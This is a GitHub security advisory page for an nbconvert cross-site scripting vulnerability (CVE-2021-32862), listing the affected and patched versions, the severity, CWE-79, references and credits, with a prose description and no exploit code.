GHSA-9jmq-rx5f-8jwq: nbconvert vulnerable to cross-site scripting (XSS) via multiple exploit paths

1. GitHub Advisory Database
2. GitHub Reviewed
3. CVE-2021-32862

nbconvert vulnerable to cross-site scripting (XSS) via multiple exploit paths

High severity GitHub Reviewed Published Aug 10, 2022 in jupyter/nbconvert • Updated Aug 10, 2022

Vulnerability details Dependabot alerts 0

We are still processing this advisory. You may have affected repositories that are not yet on this list. Check back soon for more.

Package

pip nbconvert (pip)

Affected versions

<= 6.2

Patched versions

6.3

Description

The GitHub Security Lab discovered sixteen ways to exploit a cross-site scripting vulnerability in nbconvert. When using nbconvert to generate an HTML version of a user-controllable notebook, it is possible to inject arbitrary HTML which may lead to cross-site scripting (XSS) vulnerabilities if these HTML notebooks are served by a web server (eg: nbviewer).

References

• GHSA-9jmq-rx5f-8jwq
• https://github.com/jupyter/nbviewer/security/advisories/GHSA-h274-fcvj-h2wm

SylvainCorlay published the maintainer security advisory

Aug 10, 2022

Severity

High

Weaknesses

CWE-79

CVE ID

CVE-2021-32862

GHSA ID

GHSA-9jmq-rx5f-8jwq

Source code

jupyter/nbconvert

Credits

• pwntester

Checking history

See something to contribute? Suggest improvements for this vulnerability.